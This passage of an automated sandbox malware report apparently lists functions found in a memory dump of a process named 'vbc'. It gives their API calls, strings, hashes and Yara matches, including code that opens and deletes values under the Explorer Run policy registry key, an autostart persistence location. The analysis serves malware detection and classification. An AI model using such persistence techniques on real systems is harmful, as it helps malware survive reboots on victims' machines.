                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                    • __Init_thread_footer.LIBCMT ref: 00410F29
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer__onexit
                    • String ID: ,kG$0kG
                    • API String ID: 1881088180-2015055088
                    • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                    • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                    • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                    • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteOpenValue
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                    • API String ID: 2654517830-1051519024
                    • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                    • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                    • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                    • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                    • GetLastError.KERNEL32 ref: 00440D35
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast
                    • String ID:
                    • API String ID: 1717984340-0
                    • Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                    • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                    • Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                    • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                    APIs
                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                    • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                    • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                    • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastRead
                    • String ID:
                    • API String ID: 4100373531-0
                    • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                    • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                    • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                    • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99